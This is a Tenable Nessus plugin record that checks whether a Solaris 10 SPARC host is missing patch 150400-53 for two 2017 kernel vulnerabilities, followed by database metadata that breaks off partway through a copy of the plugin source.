ID SOLARIS10_150400-53.NASL Type nessus Reporter This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2019-11-02T00:00:00
Description
Vulnerability in the Solaris component of Oracle Sun Systems Products
Suite (subcomponent: Kernel). Supported versions that are affected are
10 and 11. Easily exploitable vulnerability allows high privileged
attacker with logon to the infrastructure where Solaris executes to
compromise Solaris. Successful attacks of this vulnerability can
result in takeover of Solaris.
Vulnerability in the Solaris component of Oracle Sun Systems Products
Suite (subcomponent: Kernel). Supported versions that are affected are
10 and 11. Difficult to exploit vulnerability allows high privileged
attacker with logon to the infrastructure where Solaris executes to
compromise Solaris. Successful attacks require human interaction from
a person other than the attacker. Successful attacks of this
vulnerability can result in unauthorized update, insert or delete
access to some of Solaris accessible data.
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text in this plugin was
# extracted from the Oracle SunOS Patch Updates.
#
include("compat.inc");
if (description)
{
script_id(107721);
script_version("1.3");
script_cvs_date("Date: 2019/04/22 9:47:14");
script_cve_id("CVE-2017-10004", "CVE-2017-10122");
script_name(english:"Solaris 10 (sparc) : 150400-53");
script_summary(english:"Check for patch 150400-53");
script_set_attribute(
attribute:"synopsis",
value:"The remote host is missing Sun Security Patch number 150400-53"
);
script_set_attribute(
attribute:"description",
value:
"Vulnerability in the Solaris component of Oracle Sun Systems Products
Suite (subcomponent: Kernel). Supported versions that are affected are
10 and 11. Easily exploitable vulnerability allows high privileged
attacker with logon to the infrastructure where Solaris executes to
compromise Solaris. Successful attacks of this vulnerability can
result in takeover of Solaris.
Vulnerability in the Solaris component of Oracle Sun Systems Products
Suite (subcomponent: Kernel). Supported versions that are affected are
10 and 11. Difficult to exploit vulnerability allows high privileged
attacker with logon to the infrastructure where Solaris executes to
compromise Solaris. Successful attacks require human interaction from
a person other than the attacker. Successful attacks of this
vulnerability can result in unauthorized update, insert or delete
access to some of Solaris accessible data."
);
script_set_attribute(
attribute:"see_also",
value:"https://getupdates.oracle.com/readme/150400-53"
);
script_set_attribute(attribute:"solution", value:"Install patch 150400-53");
script_set_cvss_base_vector("CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C");
script_set_cvss3_base_vector("CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H");
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:solaris:10:122255");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:solaris:10:127980");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:solaris:10:137048");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:solaris:10:139510");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:solaris:10:139944");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:solaris:10:142007");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:solaris:10:142332");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:solaris:10:144540");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:solaris:10:146808");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:solaris:10:146838");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:solaris:10:146848");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:solaris:10:147697");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:solaris:10:148161");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:solaris:10:148174");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:solaris:10:148231");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:solaris:10:148338");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:solaris:10:148553");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:solaris:10:148557");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:solaris:10:148721");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:solaris:10:148730");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:solaris:10:148766");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:solaris:10:148875");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:solaris:10:149502");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:solaris:10:149616");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:solaris:10:149640");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:solaris:10:149642");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:solaris:10:149648");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:solaris:10:149718");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:solaris:10:149729");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:solaris:10:150108");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:solaris:10:150109");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:solaris:10:150115");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:solaris:10:150125");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:solaris:10:150161");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:solaris:10:150169");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:solaris:10:150300");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:solaris:10:150307");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:solaris:10:150311");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:solaris:10:150400");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:solaris:10:150527");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:solaris:10:150531");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:solaris:10:150532");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:solaris:10:150541");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:solaris:10:150627");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:solaris:10:150629");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:solaris:10:150756");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:solaris:10:150760");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:solaris:10:150840");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:solaris:10:150841");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:solaris:10:151145");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:solaris:10:151149");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:solaris:10:151425");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:solaris:10:151608");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:solaris:10:152367");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:solaris:10:152530");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:solaris:10:152539");
script_set_attribute(attribute:"cpe", value:"cpe:/o:oracle:solaris:10");
script_set_attribute(attribute:"vuln_publication_date", value:"2017/08/08");
script_set_attribute(attribute:"patch_publication_date", value:"2017/08/03");
script_set_attribute(attribute:"plugin_publication_date", value:"2018/03/12");
script_set_attribute(attribute:"generated_plugin", value:"current");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_family(english:"Solaris Local Security Checks");
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/Solaris/showrev");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("solaris.inc");
showrev = get_kb_item("Host/Solaris/showrev");
if (empty_or_null(showrev)) audit(AUDIT_OS_NOT, "Solaris");
os_ver = pregmatch(pattern:"Release: (\d+.(\d+))", string:showrev);
if (empty_or_null(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Solaris");
full_ver = os_ver[1];
os_level = os_ver[2];
if (full_ver != "5.10") audit(AUDIT_OS_NOT, "Solaris 10", "Solaris " + os_level);
package_arch = pregmatch(pattern:"Application architecture: (\w+)", string:showrev);
if (empty_or_null(package_arch)) audit(AUDIT_UNKNOWN_ARCH);
package_arch = package_arch[1];
if (package_arch != "sparc") audit(AUDIT_ARCH_NOT, "sparc", package_arch);
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"150400-53", obsoleted_by:"", package:"FJSVhea", version:"11.10.0,REV=2005.01.20.17.25") < 0) flag++;
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"150400-53", obsoleted_by:"", package:"FJSVmdbr", version:"11.10.0,REV=2005.01.20.17.25") < 0) flag++;
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"150400-53", obsoleted_by:"", package:"FJSVpiclu", version:"11.10.0,REV=2005.01.20.17.25") < 0) flag++;
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"150400-53", obsoleted_by:"", package:"SUNWarc", version:"11.10.0,REV=2005.01.21.15.53") < 0) flag++;
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"150400-53", obsoleted_by:"", package:"SUNWarcr", version:"11.10.0,REV=2005.01.21.15.53") < 0) flag++;
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"150400-53", obsoleted_by:"", package:"SUNWbtool", version:"11.10.0,REV=2005.01.21.15.53") < 0) flag++;
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"150400-53", obsoleted_by:"", package:"SUNWcakr", version:"11.10.0,REV=2005.08.25.02.12") < 0) flag++;
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"150400-53", obsoleted_by:"", package:"SUNWcar", version:"11.10.0,REV=2005.08.10.02.13") < 0) flag++;
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"150400-53", obsoleted_by:"", package:"SUNWckr", version:"11.10.0,REV=2005.01.21.15.53") < 0) flag++;
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"150400-53", obsoleted_by:"", package:"SUNWcpr", version:"11.10.0,REV=2005.01.21.15.53") < 0) flag++;
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"150400-53", obsoleted_by:"", package:"SUNWcry", version:"11.10.0,REV=2005.01.21.15.53") < 0) flag++;
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"150400-53", obsoleted_by:"", package:"SUNWcryr", version:"11.10.0,REV=2005.01.21.15.53") < 0) flag++;
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"150400-53", obsoleted_by:"", package:"SUNWcsl", version:"11.10.0,REV=2005.01.21.15.53") < 0) flag++;
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"150400-53", obsoleted_by:"", package:"SUNWcslr", version:"11.10.0,REV=2005.01.21.15.53") < 0) flag++;
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"150400-53", obsoleted_by:"", package:"SUNWcsr", version:"11.10.0,REV=2005.01.21.15.53") < 0) flag++;
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"150400-53", obsoleted_by:"", package:"SUNWcsu", version:"11.10.0,REV=2005.01.21.15.53") < 0) flag++;
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"150400-53", obsoleted_by:"", package:"SUNWdcar", version:"11.10.0,REV=2007.06.20.13.33") < 0) flag++;
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"150400-53", obsoleted_by:"", package:"SUNWdrcr", version:"11.10.0,REV=2005.01.21.15.53") < 0) flag++;
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"150400-53", obsoleted_by:"", package:"SUNWdtrc", version:"11.10.0,REV=2005.01.21.15.53") < 0) flag++;
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"150400-53", obsoleted_by:"", package:"SUNWdtrp", version:"11.10.0,REV=2005.01.21.15.53") < 0) flag++;
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"150400-53", obsoleted_by:"", package:"SUNWefc", version:"11.10.0,REV=2005.01.21.15.53") < 0) flag++;
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"150400-53", obsoleted_by:"", package:"SUNWefcl", version:"11.10.0,REV=2005.01.21.15.53") < 0) flag++;
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"150400-53", obsoleted_by:"", package:"SUNWfmd", version:"11.10.0,REV=2005.01.21.15.53") < 0) flag++;
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"150400-53", obsoleted_by:"", package:"SUNWfss", version:"11.10.0,REV=2005.01.21.15.53") < 0) flag++;
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"150400-53", obsoleted_by:"", package:"SUNWftdur", version:"11.10.0,REV=2005.01.21.15.53") < 0) flag++;
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"150400-53", obsoleted_by:"", package:"SUNWhea", version:"11.10.0,REV=2005.01.21.15.53") < 0) flag++;
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"150400-53", obsoleted_by:"", package:"SUNWhermon", version:"11.10.0,REV=2007.06.20.13.33") < 0) flag++;
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"150400-53", obsoleted_by:"", package:"SUNWib", version:"11.10.0,REV=2005.01.21.15.53") < 0) flag++;
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"150400-53", obsoleted_by:"", package:"SUNWintgige", version:"11.10.0,REV=2005.09.15.00.13") < 0) flag++;
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"150400-53", obsoleted_by:"", package:"SUNWiopc", version:"11.10.0,REV=2006.07.11.11.28") < 0) flag++;
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"150400-53", obsoleted_by:"", package:"SUNWipoib", version:"11.10.0,REV=2005.01.21.15.53") < 0) flag++;
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"150400-53", obsoleted_by:"", package:"SUNWkvm", version:"11.10.0,REV=2005.08.04.12.25") < 0) flag++;
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"150400-53", obsoleted_by:"", package:"SUNWldomr", version:"11.10.0,REV=2006.10.04.00.26") < 0) flag++;
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"150400-53", obsoleted_by:"", package:"SUNWldomu", version:"11.10.0,REV=2006.08.08.12.13") < 0) flag++;
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"150400-53", obsoleted_by:"", package:"SUNWmdb", version:"11.10.0,REV=2005.01.21.15.53") < 0) flag++;
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"150400-53", obsoleted_by:"", package:"SUNWmdbr", version:"11.10.0,REV=2005.01.21.15.53") < 0) flag++;
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"150400-53", obsoleted_by:"", package:"SUNWmdr", version:"11.10.0,REV=2005.01.21.15.53") < 0) flag++;
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"150400-53", obsoleted_by:"", package:"SUNWmdu", version:"11.10.0,REV=2005.01.21.15.53") < 0) flag++;
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"150400-53", obsoleted_by:"", package:"SUNWmptsas", version:"11.10.0,REV=2009.07.14.02.37") < 0) flag++;
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"150400-53", obsoleted_by:"", package:"SUNWn2cp", version:"11.10.0,REV=2007.07.08.21.44") < 0) flag++;
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"150400-53", obsoleted_by:"", package:"SUNWnfsckr", version:"11.10.0,REV=2005.01.21.15.53") < 0) flag++;
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"150400-53", obsoleted_by:"", package:"SUNWnfscr", version:"11.10.0,REV=2005.01.21.15.53") < 0) flag++;
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"150400-53", obsoleted_by:"", package:"SUNWnfscu", version:"11.10.0,REV=2005.01.21.15.53") < 0) flag++;
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"150400-53", obsoleted_by:"", package:"SUNWnfsskr", version:"11.10.0,REV=2005.01.21.15.53") < 0) flag++;
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"150400-53", obsoleted_by:"", package:"SUNWnfssu", version:"11.10.0,REV=2005.01.21.15.53") < 0) flag++;
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"150400-53", obsoleted_by:"", package:"SUNWpd", version:"11.10.0,REV=2005.01.21.15.53") < 0) flag++;
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"150400-53", obsoleted_by:"", package:"SUNWpdu", version:"11.10.0,REV=2005.01.21.15.53") < 0) flag++;
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"150400-53", obsoleted_by:"", package:"SUNWperl584core", version:"11.10.0,REV=2005.01.21.15.53") < 0) flag++;
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"150400-53", obsoleted_by:"", package:"SUNWpiclu", version:"11.10.0,REV=2005.01.21.15.53") < 0) flag++;
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"150400-53", obsoleted_by:"", package:"SUNWpkcs11kms", version:"11.10.0,REV=2011.06.03.09.16") < 0) flag++;
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"150400-53", obsoleted_by:"", package:"SUNWpmu", version:"11.10.0,REV=2005.01.21.15.53") < 0) flag++;
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"150400-53", obsoleted_by:"", package:"SUNWs8brandr", version:"11.10.0,REV=2007.10.08.16.51") < 0) flag++;
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"150400-53", obsoleted_by:"", package:"SUNWs8brandu", version:"11.10.0,REV=2007.10.08.16.51") < 0) flag++;
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"150400-53", obsoleted_by:"", package:"SUNWs9brandr", version:"11.10.0,REV=2008.04.24.03.37") < 0) flag++;
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"150400-53", obsoleted_by:"", package:"SUNWs9brandu", version:"11.10.0,REV=2008.04.24.03.37") < 0) flag++;
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"150400-53", obsoleted_by:"", package:"SUNWsmapi", version:"11.10.0,REV=2005.01.21.15.53") < 0) flag++;
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"150400-53", obsoleted_by:"", package:"SUNWssad", version:"11.10.0,REV=2005.01.21.15.53") < 0) flag++;
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"150400-53", obsoleted_by:"", package:"SUNWtoo", version:"11.10.0,REV=2005.01.21.15.53") < 0) flag++;
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"150400-53", obsoleted_by:"", package:"SUNWust1", version:"11.10.0,REV=2005.08.10.02.13") < 0) flag++;
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"150400-53", obsoleted_by:"", package:"SUNWust2", version:"11.10.0,REV=2007.07.08.17.44") < 0) flag++;
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"150400-53", obsoleted_by:"", package:"SUNWzfskr", version:"11.10.0,REV=2006.05.18.02.15") < 0) flag++;
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"150400-53", obsoleted_by:"", package:"SUNWzfsr", version:"11.10.0,REV=2006.05.18.02.15") < 0) flag++;
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"150400-53", obsoleted_by:"", package:"SUNWzfsu", version:"11.10.0,REV=2006.05.18.02.15") < 0) flag++;
if (flag) {
security_report_v4(
port : 0,
severity : SECURITY_HOLE,
extra : solaris_get_report()
);
} else {
patch_fix = solaris_patch_fix_get();
if (!empty_or_null(patch_fix)) audit(AUDIT_PATCH_INSTALLED, patch_fix, "Solaris 10");
tested = solaris_pkg_tests_get();
if (!empty_or_null(tested)) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
audit(AUDIT_PACKAGE_NOT_INSTALLED, "FJSVhea / FJSVmdbr / FJSVpiclu / SUNWarc / SUNWarcr / SUNWbtool / etc");
}
{"id": "SOLARIS10_150400-53.NASL", "bulletinFamily": "scanner", "title": "Solaris 10 (sparc) : 150400-53", "description": "Vulnerability in the Solaris component of Oracle Sun Systems Products\nSuite (subcomponent: Kernel). Supported versions that are affected are\n10 and 11. Easily exploitable vulnerability allows high privileged\nattacker with logon to the infrastructure where Solaris executes to\ncompromise Solaris. Successful attacks of this vulnerability can\nresult in takeover of Solaris.\n\nVulnerability in the Solaris component of Oracle Sun Systems Products\nSuite (subcomponent: Kernel). Supported versions that are affected are\n10 and 11. Difficult to exploit vulnerability allows high privileged\nattacker with logon to the infrastructure where Solaris executes to\ncompromise Solaris. Successful attacks require human interaction from\na person other than the attacker. Successful attacks of this\nvulnerability can result in unauthorized update, insert or delete\naccess to some of Solaris accessible data.", "published": "2018-03-12T00:00:00", "modified": "2019-11-02T00:00:00", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/107721", "reporter": "This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://getupdates.oracle.com/readme/150400-53"], "cvelist": ["CVE-2017-10004", "CVE-2017-10122"], "type": "nessus", "lastseen": "2019-11-03T12:17:02", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:oracle:solaris:10:150169", "p-cpe:/a:oracle:solaris:10:139944", "p-cpe:/a:oracle:solaris:10:150307", "p-cpe:/a:oracle:solaris:10:150629", "p-cpe:/a:oracle:solaris:10:146838", "p-cpe:/a:oracle:solaris:10:139510", "p-cpe:/a:oracle:solaris:10:152539", "p-cpe:/a:oracle:solaris:10:150108", "p-cpe:/a:oracle:solaris:10:149718", "p-cpe:/a:oracle:solaris:10:122255", "p-cpe:/a:oracle:solaris:10:148161", "p-cpe:/a:oracle:solaris:10:150115", "p-cpe:/a:oracle:solaris:10:151145", "p-cpe:/a:oracle:solaris:10:150125", "p-cpe:/a:oracle:solaris:10:150841", "p-cpe:/a:oracle:solaris:10:150527", "p-cpe:/a:oracle:solaris:10:150541", "p-cpe:/a:oracle:solaris:10:150627", "p-cpe:/a:oracle:solaris:10:127980", "p-cpe:/a:oracle:solaris:10:148557", "p-cpe:/a:oracle:solaris:10:150400", "p-cpe:/a:oracle:solaris:10:148730", "p-cpe:/a:oracle:solaris:10:151149", "p-cpe:/a:oracle:solaris:10:148766", "p-cpe:/a:oracle:solaris:10:149502", "p-cpe:/a:oracle:solaris:10:152530", "p-cpe:/a:oracle:solaris:10:150311", "p-cpe:/a:oracle:solaris:10:146808", "p-cpe:/a:oracle:solaris:10:152367", "p-cpe:/a:oracle:solaris:10:150109", "p-cpe:/a:oracle:solaris:10:147697", "p-cpe:/a:oracle:solaris:10:149640", "p-cpe:/a:oracle:solaris:10:148553", "p-cpe:/a:oracle:solaris:10:144540", "p-cpe:/a:oracle:solaris:10:150300", "p-cpe:/a:oracle:solaris:10:149648", "p-cpe:/a:oracle:solaris:10:142332", "p-cpe:/a:oracle:solaris:10:150760", "p-cpe:/a:oracle:solaris:10:150756", "p-cpe:/a:oracle:solaris:10:148875", "p-cpe:/a:oracle:solaris:10:150840", "p-cpe:/a:oracle:solaris:10:149616", "p-cpe:/a:oracle:solaris:10:142007", "p-cpe:/a:oracle:solaris:10:149642", "p-cpe:/a:oracle:solaris:10:137048", "p-cpe:/a:oracle:solaris:10:151425", "cpe:/o:oracle:solaris:10", "p-cpe:/a:oracle:solaris:10:148174", "p-cpe:/a:oracle:solaris:10:148231", "p-cpe:/a:oracle:solaris:10:150161", "p-cpe:/a:oracle:solaris:10:149729", "p-cpe:/a:oracle:solaris:10:148721", "p-cpe:/a:oracle:solaris:10:146848", "p-cpe:/a:oracle:solaris:10:150532", "p-cpe:/a:oracle:solaris:10:151608", "p-cpe:/a:oracle:solaris:10:148338", "p-cpe:/a:oracle:solaris:10:150531"], "cvelist": ["CVE-2017-10004", "CVE-2017-10122"], "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "description": "Vulnerability in the Solaris component of Oracle Sun Systems Products\nSuite (subcomponent: Kernel). Supported versions that are affected are\n10 and 11. Easily exploitable vulnerability allows high privileged\nattacker with logon to the infrastructure where Solaris executes to\ncompromise Solaris. Successful attacks of this vulnerability can\nresult in takeover of Solaris.\n\nVulnerability in the Solaris component of Oracle Sun Systems Products\nSuite (subcomponent: Kernel). Supported versions that are affected are\n10 and 11. Difficult to exploit vulnerability allows high privileged\nattacker with logon to the infrastructure where Solaris executes to\ncompromise Solaris. Successful attacks require human interaction from\na person other than the attacker. Successful attacks of this\nvulnerability can result in unauthorized update, insert or delete\naccess to some of Solaris accessible data.", "edition": 7, "enchantments": {"dependencies": {"modified": "2019-10-28T21:20:59", "references": [{"idList": ["CVE-2017-10004", "CVE-2017-10122"], "type": "cve"}, {"idList": ["SOLARIS10_150400-51.NASL", "SOLARIS10_X86_150401-51.NASL", "SOLARIS10_150400-52.NASL", "SOLARIS10_X86_150401-52.NASL", "SOLARIS10_X86_150401-53.NASL", "SOLARIS_JUL2017_SRU11_3_21_5_0.NASL"], "type": "nessus"}, {"idList": ["ORACLE:CPUJUL2017-3236622"], "type": "oracle"}, {"idList": ["1337DAY-ID-30020", "1337DAY-ID-30984", "1337DAY-ID-29403", "1337DAY-ID-29207", "1337DAY-ID-29575", "1337DAY-ID-29087", "1337DAY-ID-29361", "1337DAY-ID-30017"], "type": "zdt"}]}, "score": {"modified": "2019-10-28T21:20:59", "value": 6.0, "vector": "NONE"}}, "hash": "c3246d2e8eec811d8f824ceeff43d209dc5095cb097a09f6078c60d3cf02fd8e", "hashmap": [{"hash": "be2073bfad5e624acf0f878f09eda795", "key": "naslFamily"}, {"hash": "2f557dd1a5dfe7846d859df9ecc45cb4", "key": "cvelist"}, {"hash": "5a88ad0a23edad02ee3a4d404f1bd9d0", "key": "description"}, {"hash": "0975adf19adb993cc2dc44ea6b27d31e", "key": "reporter"}, {"hash": "2a6f0a0db5016ac737e102020eef9e9e", "key": "cpe"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "37bebe7f021fd7843fb8432eec57a1e8", "key": "sourceData"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "0bafb6325bcaf483a25404f785191cc5", "key": "modified"}, {"hash": "0e2de2f910ca127ad179eb481fe7c6b1", "key": "references"}, {"hash": "e2721fd2840ebae34e5766f6ae74bd8c", "key": "href"}, {"hash": "b02ba0108bebf04af1fc81be81a6b920", "key": "pluginID"}, {"hash": "cea8147bf5d9fafd75da0830e93a2ee0", "key": "title"}, {"hash": "5850355f6181ab9617cc0d094e464031", "key": "published"}, {"hash": "f74481c4d3fb2a622ac8c8a438ded811", "key": "cvss"}], "history": [], "href": "https://www.tenable.com/plugins/nessus/107721", "id": "SOLARIS10_150400-53.NASL", "lastseen": "2019-10-28T21:20:59", "modified": "2019-10-02T00:00:00", "naslFamily": "Solaris Local Security Checks", "objectVersion": "1.3", "pluginID": "107721", "published": "2018-03-12T00:00:00", "references": ["https://getupdates.oracle.com/readme/150400-53"], "reporter": "This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(107721);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/04/22 9:47:14\");\n\n script_cve_id(\"CVE-2017-10004\", \"CVE-2017-10122\");\n\n script_name(english:\"Solaris 10 (sparc) : 150400-53\");\n script_summary(english:\"Check for patch 150400-53\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 150400-53\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Vulnerability in the Solaris component of Oracle Sun Systems Products\nSuite (subcomponent: Kernel). Supported versions that are affected are\n10 and 11. Easily exploitable vulnerability allows high privileged\nattacker with logon to the infrastructure where Solaris executes to\ncompromise Solaris. Successful attacks of this vulnerability can\nresult in takeover of Solaris.\n\nVulnerability in the Solaris component of Oracle Sun Systems Products\nSuite (subcomponent: Kernel). Supported versions that are affected are\n10 and 11. Difficult to exploit vulnerability allows high privileged\nattacker with logon to the infrastructure where Solaris executes to\ncompromise Solaris. Successful attacks require human interaction from\na person other than the attacker. Successful attacks of this\nvulnerability can result in unauthorized update, insert or delete\naccess to some of Solaris accessible data.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/150400-53\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Install patch 150400-53\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:122255\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:127980\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:137048\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:139510\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:139944\");\n 